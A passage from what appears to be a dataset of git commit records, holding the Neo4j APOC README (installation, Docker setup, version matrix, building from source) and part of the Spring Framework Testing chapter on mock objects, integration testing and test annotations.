\nThe three backslashes are necessary to prevent wildcard expansions.\n====\n\n\/\/ end::docker[]\n\/\/ tag::build[]\n\n=== Build & install the current development branch from source\n\n----\ngit clone http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\ncd neo4j-apoc-procedures\n.\/gradlew shadow\ncp build\/libs\/apoc-<version>-all.jar $NEO4J_HOME\/plugins\/\n$NEO4J_HOME\/bin\/neo4j restart\n----\n\n\/\/ If you want to run embedded or use neo4j-shell on a disk store, configure your `plugins` directory in `conf\/neo4j.conf` with `dbms.plugin.directory=path\/to\/plugins`.\n\nA full build including running the tests can be run by `.\/gradlew build`.\n\n\/\/ end::build[]\n","old_contents":":readme:\n:branch: 3.5\n:docs: https:\/\/neo4j.com\/docs\/labs\/apoc\/current\n:apoc-release: 3.5.0.4\n:neo4j-version: 3.5.6\n:img: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/images\n\n= Awesome Procedures for Neo4j {branch}.x\n\n\/\/ tag::readme[]\n\n== Introduction\n\n\/\/ tag::intro[]\nimage::{img}\/apoc.gif[float=right]\n\n\/\/ tag::intro-text[]\nNeo4j 3.x introduced the concept of user-defined procedures and functions.\nThose are custom implementations of certain functionality that can't be (easily) expressed in Cypher itself.\nThey are implemented in Java and can be easily deployed into your Neo4j instance, and then be called from Cypher directly.\n\nThe APOC library consists of many (about 450) procedures and functions to help with many different tasks in areas like data integration, graph algorithms or data conversion.\n\/\/ end::intro-text[]\n\n=== License\n\nApache License 2.0\n\n\/\/ tag::name-history[]\n=== "APOC" Name history\n\n\/\/ tag::name-history-text[]\nhttp:\/\/matrix.wikia.com\/wiki\/Apoc[Apoc^] was the technician and driver on board the Nebuchadnezzar in the Matrix movie. 
He was killed by Cypher.\n\n*APOC* was also the first bundled http:\/\/neo4j.com\/blog\/convenient-package-neo4j-apoc-0-1-released\/[A Package Of Component^] for Neo4j in 2009.\n\n*APOC* also stands for \"Awesome Procedures On Cypher\"\n\/\/ end::name-history-text[]\n\/\/ end::name-history[]\n\n\/\/ tag::install-desktop[]\n== Installation: With Neo4j Desktop\n\nAPOC is easily installed with http:\/\/neo4j.com\/download[Neo4j Desktop]. After creating your database, just go to the \"Manage\" screen and the \"Plugins\" tab.\nThen click \"Install\" in the APOC box and you're done.\n\n\/\/ end::install-desktop[]\nimage::{img}\/desktop-apoc.jpg[width=800]\n\n== Feedback\n\n\/\/ tag::feedback[]\nPlease provide feedback and report bugs as https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/issues[GitHub issues] or join the https:\/\/community.neo4j.com\/c\/neo4j-graph-platform\/procedures-apoc[Neo4j Community Forum and ask in the APOC & Procedures category^].\n\/\/ end::feedback[]\n\n\/\/ tag::calling-procedures[]\n\n== Calling Procedures & Functions within Cypher\n\n\/\/ tag::usage[]\nUser defined *Functions* can be used in *any* expression or predicate, just like built-in functions.\n\n*Procedures* can be called stand-alone with `CALL procedure.name();`\n\nBut you can also integrate them into your Cypher statements, which makes them so much more powerful.\n\n.Load JSON example\n[source,cypher]\n----\nWITH 'https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/src\/test\/resources\/person.json' AS url\n\nCALL apoc.load.json(url) YIELD value as person\n\nMERGE (p:Person {name:person.name})\n ON CREATE SET p.age = person.age, p.children = size(person.children)\n----\n\/\/ end::usage[]\n\/\/ end::calling-procedures[]\n\n\/\/ end::intro[]\n\n\n== APOC Procedures & Functions Overview\n\nAll included procedures are listed in the link:{docs}\/overview[overview in the documentation^] and detailed in subsequent sections.\n\n=== Built-in Help\n\n\/\/ tag::help[]\nimage::{img}\/apoc-help-apoc.jpg[width=600]\n\n\n[cols=\"1m,5\"]\n|===\n| call apoc.help('keyword') | lists name, description, signature, roles, based on keyword\n|===\n\n\/\/ end::help[]\n\n== Detailed Feature Documentation\n\nSee the link:{docs}[APOC User Guide^] for documentation of each of the major features of the library, including data import\/export, graph refactoring, data conversion, and more.\n\n\/\/ tag::signature[]\n\n== Procedure & Function Signatures\n\nTo call procedures correctly, you need to know their parameter names, types and positions.\nAnd for YIELDing their results, you have to know the output column names and types.\n\nINFO: The signatures are shown in error messages if you use a procedure incorrectly.\n\nYou can see a procedure's signature in the output of `CALL apoc.help(\"name\")`:\n\n[source,cypher]\n----\nCALL apoc.help(\"dijkstra\")\n----\n\nThe signature is always `name : : TYPE`, so in this case:\n\n----\napoc.algo.dijkstra\n (startNode :: NODE?, endNode :: NODE?,\n relationshipTypesAndDirections :: STRING?, weightPropertyName :: STRING?)\n:: (path :: PATH?, weight :: FLOAT?)\n----\n\n.Parameter Explanation\n[opts=header,cols=\"m,m\"]\n|===\n| Name | Type\nh| Procedure Parameters |\n| startNode | Node\n| endNode | Node\n| relationshipTypesAndDirections | String\n| weightPropertyName | String\nh| Output Return Columns |\n| path | Path\n| weight | Float\n|===\n\n\/\/ end::signature[]\n\n\/\/ tag::install[]\n\n== Manual Installation: Download latest release\n\nSince APOC relies in 
some places on Neo4j's internal APIs, you need to use the *matching APOC version* for your Neo4j installation.\nMake sure that the *first two version numbers match between Neo4j and APOC*.\n\nGo to http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/{apoc-release}[the latest release] for *Neo4j version {branch}* and download the binary jar to place into your `$NEO4J_HOME\/plugins` folder.\n\nYou can find http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/[all releases here].\n\n\/\/ end::install[]\n\n== Manual Configuration\n\n\/\/ tag::warnings[]\n\n[WARNING]\n====\nProcedures that use internal APIs have to be allowed in `$NEO4J_HOME\/conf\/neo4j.conf` with, e.g. `+dbms.security.procedures.unrestricted=apoc.*+` for security reasons.\n\nIf you want to use this via docker, you need to amend `+-e NEO4J_dbms_security_procedures_unrestricted=apoc.\\\\\\*+` to your `docker run ...` command. \nThe three backslashes are necessary to prevent wildcard expansions.\n\nYou _can_ also whitelist procedures and functions in general to be loaded using: `+dbms.security.procedures.whitelist=apoc.coll.*,apoc.load.*+`\n====\n\n\/\/ end::warnings[]\n\n\/\/ tag::version-matrix[]\n=== Version Compatibility Matrix\n\nSince APOC relies in some places on Neo4j's internal APIs, you need to use the right APOC version for your Neo4j installation.\n\nAPOC uses a consistent versioning scheme: `<neo4j-version>.<apoc>` version. \nThe trailing `<apoc>` part of the version number will be incremented with every apoc release.\n\n[opts=header]\n|===\n|apoc version | neo4j version\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.5.0.4[3.5.0.4^] | 3.5.6 (3.5.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.4.0.6[3.4.0.6^] | 3.4.12 (3.4.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.3.0.4[3.3.0.4^] | 3.3.6 (3.3.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.2.3.6[3.2.3.6^] | 3.2.9 (3.2.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.1.3.9[3.1.3.9^] | 3.1.7 (3.1.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.0.8.6[3.0.8.6^] | 3.0.5-3.0.9 (3.0.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.5.0.0[3.5.0.0^] | 3.5.0-beta01\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.4.0.2[3.4.0.2^] | 3.4.5\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.3.0.3[3.3.0.3^] | 3.3.5\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.2.3.5[3.2.3.5^] | 3.2.3\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.1.3.8[3.1.3.8^] | 3.1.5\n|===\n\n\/\/ end::version-matrix[]\n=== Get APOC Version\n\nTo know your current `apoc` version, you can use the *function*:\n\n[source,cypher]\n----\nRETURN apoc.version();\n----\n\n\/\/ tag::docker[]\n\n=== Using APOC with the Neo4j Docker image\n\nThe https:\/\/hub.docker.com\/_\/neo4j\/[Neo4j Docker image] allows you to supply a volume for the `\/plugins` folder. 
\nDownload the APOC release matching your Neo4j version to local folder `plugins` and provide it as a data volume:\n\n[source,bash,subs=attributes]\n----\nmkdir plugins\npushd plugins\nwget https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/download\/{apoc-release}\/apoc-{apoc-release}-all.jar\npopd\ndocker run --rm -e NEO4J_AUTH=none -p 7474:7474 -v $PWD\/plugins:\/plugins -p 7687:7687 neo4j:{branch}\n----\n\nIf you want to pass custom apoc config to your Docker instance, you can use environment variables, like here:\n\n----\ndocker run \\\n -p 7474:7474 -p 7687:7687 \\\n -v $PWD\/data:\/data -v $PWD\/plugins:\/plugins \\\n --name neo4j-apoc \\\n -e NEO4J_apoc_export_file_enabled=true \\\n -e NEO4J_apoc_import_file_enabled=true \\\n -e NEO4J_apoc_import_file_use__neo4j__config=true \\\n neo4j\n----\n\n====\nIf you want to allow APOC's procedures that use internal APIs, you need to amend `+-e NEO4J_dbms_security_procedures_unrestricted=apoc.\\\\\\*+` to your `docker run ...` command. \nThe three backslashes are necessary to prevent wildcard expansions.\n====\n\n\/\/ end::docker[]\n\/\/ tag::build[]\n\n=== Build & install the current development branch from source\n\n----\ngit clone http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\ncd neo4j-apoc-procedures\n.\/gradlew shadow\ncp build\/libs\/apoc-<version>-all.jar $NEO4J_HOME\/plugins\/\n$NEO4J_HOME\/bin\/neo4j restart\n----\n\n\/\/ If you want to run embedded or use neo4j-shell on a disk store, configure your `plugins` directory in `conf\/neo4j.conf` with `dbms.plugin.directory=path\/to\/plugins`.\n\nA full build including running the tests can be run by `.\/gradlew build`.\n\n\/\/ end::build[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2408e2515a48a6eb49048ffe1ecd24cb9067ac0c","subject":"Escape hashtag in Testing chapter to disable Asciidoc highlighting","message":"Escape hashtag in Testing chapter to disable Asciidoc highlighting\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/testing.adoc","new_file":"src\/docs\/asciidoc\/testing.adoc","new_contents":"[[testing]]\n= Testing\n:doc-root: https:\/\/docs.spring.io\n:api-spring-framework: {doc-root}\/spring-framework\/docs\/{spring-version}\/javadoc-api\/org\/springframework\n:doc-spring-boot: {doc-root}\/spring-boot\/docs\/current\/reference\n:toc: left\n:toclevels: 2\n:docinfo1:\n\nThe adoption of the test-driven development (TDD) approach to software\ndevelopment is certainly advocated by the Spring team, and so this chapter covers Spring's\nsupport for integration testing (alongside best practices for unit testing).\nThe Spring team has found that the correct use of IoC certainly does make both unit and\nintegration testing easier (in that the presence of setter methods and appropriate\nconstructors on classes makes them easier to wire together in a test without having to\nset up service locator registries and the like). The chapter dedicated solely to\ntesting will hopefully convince you of this as well.\n\n\n[[testing-introduction]]\n== Introduction to Spring Testing\nTesting is an integral part of enterprise software development. 
This chapter focuses on\nthe value-add of the IoC principle to <<unit-testing,unit testing>> and on the benefits\nof the Spring Framework's support for <<integration-testing,integration testing>>. __(A\nthorough treatment of testing in the enterprise is beyond the scope of this reference\nmanual.)__\n\n\n[[unit-testing]]\n== Unit Testing\nDependency Injection should make your code less dependent on the container than it would\nbe with traditional Java EE development. The POJOs that make up your application should\nbe testable in JUnit or TestNG tests, with objects simply instantiated using the `new`\noperator, __without Spring or any other container__. You can use <<mock-objects,mock\nobjects>> (in conjunction with other valuable testing techniques) to test your code in\nisolation. If you follow the architecture recommendations for Spring, the resulting\nclean layering and componentization of your codebase will facilitate easier unit\ntesting. For example, you can test service layer objects by stubbing or mocking DAO or\nRepository interfaces, without needing to access persistent data while running unit\ntests.\n\nTrue unit tests typically run extremely quickly, as there is no runtime infrastructure\nto set up. Emphasizing true unit tests as part of your development methodology will\nboost your productivity. You may not need this section of the testing chapter to help\nyou write effective unit tests for your IoC-based applications. For certain unit testing\nscenarios, however, the Spring Framework provides the following mock objects and testing\nsupport classes.\n\n\n\n[[mock-objects]]\n=== Mock Objects\n\n\n[[mock-objects-env]]\n==== Environment\nThe `org.springframework.mock.env` package contains mock implementations of the\n`Environment` and `PropertySource` abstractions (see\n<<core.adoc#beans-definition-profiles, Bean definition profiles>>\nand <<core.adoc#beans-property-source-abstraction, PropertySource abstraction>>).\n`MockEnvironment` and `MockPropertySource` are useful for developing\n__out-of-container__ tests for code that depends on environment-specific properties.\n\n\n[[mock-objects-jndi]]\n==== JNDI\nThe `org.springframework.mock.jndi` package contains an implementation of the JNDI SPI,\nwhich you can use to set up a simple JNDI environment for test suites or stand-alone\napplications. If, for example, JDBC ``DataSource``s get bound to the same JNDI names in\ntest code as within a Java EE container, you can reuse both application code and\nconfiguration in testing scenarios without modification.\n\n\n[[mock-objects-servlet]]\n==== Servlet API\nThe `org.springframework.mock.web` package contains a comprehensive set of Servlet API\nmock objects, which are useful for testing web contexts, controllers, and filters. These\nmock objects are targeted at usage with Spring's Web MVC framework and are generally more\nconvenient to use than dynamic mock objects such as http:\/\/www.easymock.org[EasyMock] or\nalternative Servlet API mock objects such as http:\/\/www.mockobjects.com[MockObjects]. 
Since\nSpring Framework 5.0, the set of mocks in the `org.springframework.mock.web` package is\nbased on the Servlet 4.0 API.\n\nFor thorough integration testing of your Spring MVC and REST ``Controller``s in\nconjunction with your `WebApplicationContext` configuration for Spring MVC, see the\n<<spring-mvc-test-framework,_Spring MVC Test Framework_>>.\n\n\n\n[[unit-testing-support-classes]]\n=== Unit Testing support Classes\n\n\n[[unit-testing-utilities]]\n==== General testing utilities\nThe `org.springframework.test.util` package contains several general purpose utilities\nfor use in unit and integration testing.\n\n`ReflectionTestUtils` is a collection of reflection-based utility methods. Developers use\nthese methods in testing scenarios where they need to change the value of a constant, set\na non-`public` field, invoke a non-`public` setter method, or invoke a non-`public`\n_configuration_ or _lifecycle_ callback method when testing application code involving\nuse cases such as the following.\n\n* ORM frameworks such as JPA and Hibernate that condone `private` or `protected` field\n access as opposed to `public` setter methods for properties in a domain entity.\n* Spring's support for annotations such as `@Autowired`, `@Inject`, and `@Resource`,\n which provides dependency injection for `private` or `protected` fields, setter\n methods, and configuration methods.\n* Use of annotations such as `@PostConstruct` and `@PreDestroy` for lifecycle callback\n methods.\n\n`AopTestUtils` is a collection of AOP-related utility methods. These methods can be used\nto obtain a reference to the underlying target object hidden behind one or more Spring\nproxies. For example, if you have configured a bean as a dynamic mock using a library\nlike EasyMock or Mockito and the mock is wrapped in a Spring proxy, you may need direct\naccess to the underlying mock in order to configure expectations on it and perform\nverifications. For Spring's core AOP utilities, see `AopUtils` and `AopProxyUtils`.\n\n\n\n[[unit-testing-spring-mvc]]\n==== Spring MVC\nThe `org.springframework.test.web` package contains `ModelAndViewAssert`, which you can\nuse in combination with JUnit, TestNG, or any other testing framework for unit tests\ndealing with Spring MVC `ModelAndView` objects.\n\n.Unit testing Spring MVC Controllers\n[TIP]\n====\nTo unit test your Spring MVC ``Controller``s as POJOs, use `ModelAndViewAssert` combined\nwith `MockHttpServletRequest`, `MockHttpSession`, and so on from Spring's\n<<mock-objects-servlet, Servlet API mocks>>. For thorough integration testing of your\nSpring MVC and REST ``Controller``s in conjunction with your `WebApplicationContext`\nconfiguration for Spring MVC, use the <<spring-mvc-test-framework,_Spring MVC Test\nFramework_>> instead.\n====\n\n\n\n\n[[integration-testing]]\n== Integration Testing\n\n\n\n[[integration-testing-overview]]\n=== Overview\nIt is important to be able to perform some integration testing without requiring\ndeployment to your application server or connecting to other enterprise infrastructure.\nThis will enable you to test things such as:\n\n* The correct wiring of your Spring IoC container contexts.\n* Data access using JDBC or an ORM tool. This would include such things as the\n correctness of SQL statements, Hibernate queries, JPA entity mappings, etc.\n\nThe Spring Framework provides first-class support for integration testing in the\n`spring-test` module. 
The name of the actual JAR file might include the release version\nand might also be in the long `org.springframework.test` form, depending on where you\nget it from (see the <<core.adoc#dependency-management,section on Dependency Management>> for an\nexplanation). This library includes the `org.springframework.test` package, which\ncontains valuable classes for integration testing with a Spring container. This testing\ndoes not rely on an application server or other deployment environment. Such tests are\nslower to run than unit tests but much faster than the equivalent Selenium tests or remote\ntests that rely on deployment to an application server.\n\nIn Spring 2.5 and later, unit and integration testing support is provided in the form of\nthe annotation-driven <<testcontext-framework,Spring TestContext Framework>>. The\nTestContext framework is agnostic of the actual testing framework in use, thus allowing\ninstrumentation of tests in various environments including JUnit, TestNG, and so on.\n\n\n\n[[integration-testing-goals]]\n=== Goals of Integration Testing\nSpring's integration testing support has the following primary goals:\n\n* To manage <<testing-ctx-management,Spring IoC container caching>> between test\n execution.\n* To provide <<testing-fixture-di,Dependency Injection of test fixture instances>>.\n* To provide <<testing-tx,transaction management>> appropriate to integration testing.\n* To supply <<testing-support-classes,Spring-specific base classes>> that assist\n developers in writing integration tests.\n\nThe next few sections describe each goal and provide links to implementation and\nconfiguration details.\n\n\n[[testing-ctx-management]]\n==== Context management and caching\nThe Spring TestContext Framework provides consistent loading of Spring\n``ApplicationContext``s and ``WebApplicationContext``s as well as caching of those\ncontexts. Support for the caching of loaded contexts is important, because startup time\ncan become an issue -- not because of the overhead of Spring itself, but because the\nobjects instantiated by the Spring container take time to instantiate. For example, a\nproject with 50 to 100 Hibernate mapping files might take 10 to 20 seconds to load the\nmapping files, and incurring that cost before running every test in every test fixture\nleads to slower overall test runs that reduce developer productivity.\n\nTest classes typically declare either an array of __resource locations__ for XML or Groovy\nconfiguration metadata -- often in the classpath -- or an array of __annotated classes__\nthat is used to configure the application. These locations or classes are the same as or\nsimilar to those specified in `web.xml` or other configuration files for production\ndeployments.\n\nBy default, once loaded, the configured `ApplicationContext` is reused for each test.\nThus the setup cost is incurred only once per test suite, and subsequent test execution\nis much faster. In this context, the term __test suite__ means all tests run in the same\nJVM -- for example, all tests run from an Ant, Maven, or Gradle build for a given\nproject or module. 
In the unlikely case that a test corrupts the application context and\nrequires reloading -- for example, by modifying a bean definition or the state of an\napplication object -- the TestContext framework can be configured to reload the\nconfiguration and rebuild the application context before executing the next test.\n\nSee <<testcontext-ctx-management>> and <<testcontext-ctx-management-caching>> with the\nTestContext framework.\n\n\n[[testing-fixture-di]]\n==== Dependency Injection of test fixtures\nWhen the TestContext framework loads your application context, it can optionally\nconfigure instances of your test classes via Dependency Injection. This provides a\nconvenient mechanism for setting up test fixtures using preconfigured beans from your\napplication context. A strong benefit here is that you can reuse application contexts\nacross various testing scenarios (e.g., for configuring Spring-managed object graphs,\ntransactional proxies, ``DataSource``s, etc.), thus avoiding the need to duplicate\ncomplex test fixture setup for individual test cases.\n\nAs an example, consider the scenario where we have a class, `HibernateTitleRepository`,\nthat implements data access logic for a `Title` domain entity. We want to write\nintegration tests that test the following areas:\n\n* The Spring configuration: basically, is everything related to the configuration of the\n `HibernateTitleRepository` bean correct and present?\n* The Hibernate mapping file configuration: is everything mapped correctly, and are the\n correct lazy-loading settings in place?\n* The logic of the `HibernateTitleRepository`: does the configured instance of this\n class perform as anticipated?\n\nSee dependency injection of test fixtures with the <<testcontext-fixture-di,TestContext\nframework>>.\n\n\n[[testing-tx]]\n==== Transaction management\nOne common issue in tests that access a real database is their effect on the state of\nthe persistence store. Even when you're using a development database, changes to the\nstate may affect future tests. Also, many operations -- such as inserting or modifying\npersistent data -- cannot be performed (or verified) outside a transaction.\n\nThe TestContext framework addresses this issue. By default, the framework will create\nand roll back a transaction for each test. You simply write code that can assume the\nexistence of a transaction. If you call transactionally proxied objects in your tests,\nthey will behave correctly, according to their configured transactional semantics. In\naddition, if a test method deletes the contents of selected tables while running within\nthe transaction managed for the test, the transaction will roll back by default, and the\ndatabase will return to its state prior to execution of the test. Transactional support\nis provided to a test via a `PlatformTransactionManager` bean defined in the test's\napplication context.\n\nIf you want a transaction to commit -- unusual, but occasionally useful when you want a\nparticular test to populate or modify the database -- the TestContext framework can be\ninstructed to cause the transaction to commit instead of roll back via the\n<<integration-testing-annotations, `@Commit`>> annotation.\n\nSee transaction management with the <<testcontext-tx,TestContext framework>>.\n\n\n[[testing-support-classes]]\n==== Support classes for integration testing\nThe Spring TestContext Framework provides several `abstract` support classes that\nsimplify the writing of integration tests. 
These base test classes provide well-defined\nhooks into the testing framework as well as convenient instance variables and methods,\nwhich enable you to access:\n\n* The `ApplicationContext`, for performing explicit bean lookups or testing the state of\n the context as a whole.\n* A `JdbcTemplate`, for executing SQL statements to query the database. Such queries can\n be used to confirm database state both __prior to__ and __after__ execution of\n database-related application code, and Spring ensures that such queries run in the\n scope of the same transaction as the application code. When used in conjunction with\n an ORM tool, be sure to avoid <<testcontext-tx-false-positives,false positives>>.\n\nIn addition, you may want to create your own custom, application-wide superclass with\ninstance variables and methods specific to your project.\n\nSee support classes for the <<testcontext-support-classes,TestContext framework>>.\n\n\n\n[[integration-testing-support-jdbc]]\n=== JDBC Testing Support\nThe `org.springframework.test.jdbc` package contains `JdbcTestUtils`, which is a\ncollection of JDBC related utility functions intended to simplify standard database\ntesting scenarios. Specifically, `JdbcTestUtils` provides the following static utility\nmethods.\n\n* `countRowsInTable(..)`: counts the number of rows in the given table\n* `countRowsInTableWhere(..)`: counts the number of rows in the given table, using\nthe provided `WHERE` clause\n* `deleteFromTables(..)`: deletes all rows from the specified tables\n* `deleteFromTableWhere(..)`: deletes rows from the given table, using the provided\n`WHERE` clause\n* `dropTables(..)`: drops the specified tables\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nprovide convenience methods which delegate to the aforementioned methods in\n`JdbcTestUtils`.__\n\nThe `spring-jdbc` module provides support for configuring and launching an embedded\ndatabase which can be used in integration tests that interact with a database. For\ndetails, see <<data-access.adoc#jdbc-embedded-database-support, Embedded database support>>\nand <<data-access.adoc#jdbc-embedded-database-dao-testing, Testing data access logic\nwith an embedded database>>.\n\n\n\n[[integration-testing-annotations]]\n=== Annotations\n\n\n[[integration-testing-annotations-spring]]\n==== Spring Testing Annotations\nThe Spring Framework provides the following set of __Spring-specific__ annotations that\nyou can use in your unit and integration tests in conjunction with the TestContext\nframework. Refer to the corresponding javadocs for further information, including\ndefault attribute values, attribute aliases, and so on.\n\n===== @BootstrapWith\n`@BootstrapWith` is a class-level annotation that is used to configure how the _Spring\nTestContext Framework_ is bootstrapped. Specifically, `@BootstrapWith` is used to specify\na custom `TestContextBootstrapper`. Consult the <<testcontext-bootstrapping,Bootstrapping\nthe TestContext framework>> section for further details.\n\n===== @ContextConfiguration\n`@ContextConfiguration` defines class-level metadata that is used to determine how to\nload and configure an `ApplicationContext` for integration tests. 
Specifically,\n`@ContextConfiguration` declares the application context resource `locations` or the\nannotated `classes` that will be used to load the context.\n\nResource locations are typically XML configuration files or Groovy scripts located in\nthe classpath, whereas annotated classes are typically `@Configuration` classes. However,\nresource locations can also refer to files and scripts in the file system, and annotated\nclasses can be component classes, etc.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(\"\/test-config.xml\")\n\tpublic class XmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**classes** = TestConfig.class)\n\tpublic class ConfigClassApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\nAs an alternative or in addition to declaring resource locations or annotated classes,\n`@ContextConfiguration` may be used to declare `ApplicationContextInitializer` classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**initializers** = CustomContextInitializer.class)\n\tpublic class ContextInitializerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` may optionally be used to declare the `ContextLoader` strategy\nas well. Note, however, that you typically do not need to explicitly configure the\nloader since the default loader supports either resource `locations` or annotated\n`classes` as well as `initializers`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**locations** = \"\/test-context.xml\", **loader** = CustomContextLoader.class)\n\tpublic class CustomLoaderXmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[NOTE]\n====\n`@ContextConfiguration` provides support for __inheriting__ resource locations or\nconfiguration classes as well as context initializers declared by superclasses by\ndefault.\n====\n\nSee <<testcontext-ctx-management>> and the `@ContextConfiguration` javadocs for\nfurther details.\n\n===== @WebAppConfiguration\n`@WebAppConfiguration` is a class-level annotation that is used to declare that the\n`ApplicationContext` loaded for an integration test should be a `WebApplicationContext`.\nThe mere presence of `@WebAppConfiguration` on a test class ensures that a\n`WebApplicationContext` will be loaded for the test, using the default value of\n`\"file:src\/main\/webapp\"` for the path to the root of the web application (i.e., the\n__resource base path__). The resource base path is used behind the scenes to create a\n`MockServletContext` which serves as the `ServletContext` for the test's\n`WebApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\nTo override the default, specify a different base resource path via the __implicit__\n`value` attribute. Both `classpath:` and `file:` resource prefixes are supported. 
If no\nresource prefix is supplied the path is assumed to be a file system resource.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration(\"classpath:test-web-resources\")**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\nNote that `@WebAppConfiguration` must be used in conjunction with\n`@ContextConfiguration`, either within a single test class or within a test class\nhierarchy. See the `@WebAppConfiguration` javadocs for further details.\n\n===== @ContextHierarchy\n`@ContextHierarchy` is a class-level annotation that is used to define a hierarchy of\n``ApplicationContext``s for integration tests. `@ContextHierarchy` should be declared\nwith a list of one or more `@ContextConfiguration` instances, each of which defines a\nlevel in the context hierarchy. The following examples demonstrate the use of\n`@ContextHierarchy` within a single test class; however, `@ContextHierarchy` can also be\nused within a test class hierarchy.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class ContextHierarchyTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = AppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class WebIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you need to merge or override the configuration for a given level of the context\nhierarchy within a test class hierarchy, you must explicitly name that level by\nsupplying the same value to the `name` attribute in `@ContextConfiguration` at each\ncorresponding level in the class hierarchy. See\n<<testcontext-ctx-management-ctx-hierarchies>> and the `@ContextHierarchy` javadocs\nfor further examples.\n\n===== @ActiveProfiles\n`@ActiveProfiles` is a class-level annotation that is used to declare which __bean\ndefinition profiles__ should be active when loading an `ApplicationContext` for an\nintegration test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**(\"dev\")\n\tpublic class DeveloperTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**({\"dev\", \"integration\"})\n\tpublic class DeveloperIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[NOTE]\n====\n`@ActiveProfiles` provides support for __inheriting__ active bean definition profiles\ndeclared by superclasses by default. 
It is also possible to resolve active bean\ndefinition profiles programmatically by implementing a custom\n<<testcontext-ctx-management-env-profiles-ActiveProfilesResolver,`ActiveProfilesResolver`>>\nand registering it via the `resolver` attribute of `@ActiveProfiles`.\n====\n\nSee <<testcontext-ctx-management-env-profiles>> and the `@ActiveProfiles` javadocs\nfor examples and further details.\n\n===== @TestPropertySource\n`@TestPropertySource` is a class-level annotation that is used to configure the locations\nof properties files and inlined properties to be added to the set of `PropertySources` in\nthe `Environment` for an `ApplicationContext` loaded for an integration test.\n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\nThe following example demonstrates how to declare a properties file from the classpath.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\nThe following example demonstrates how to declare _inlined_ properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(properties = { \"timezone = GMT\", \"port: 4242\" })\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n===== @DirtiesContext\n`@DirtiesContext` indicates that the underlying Spring `ApplicationContext` has been\n__dirtied__ during the execution of a test (i.e., modified or corrupted in some manner --\nfor example, by changing the state of a singleton bean) and should be closed. 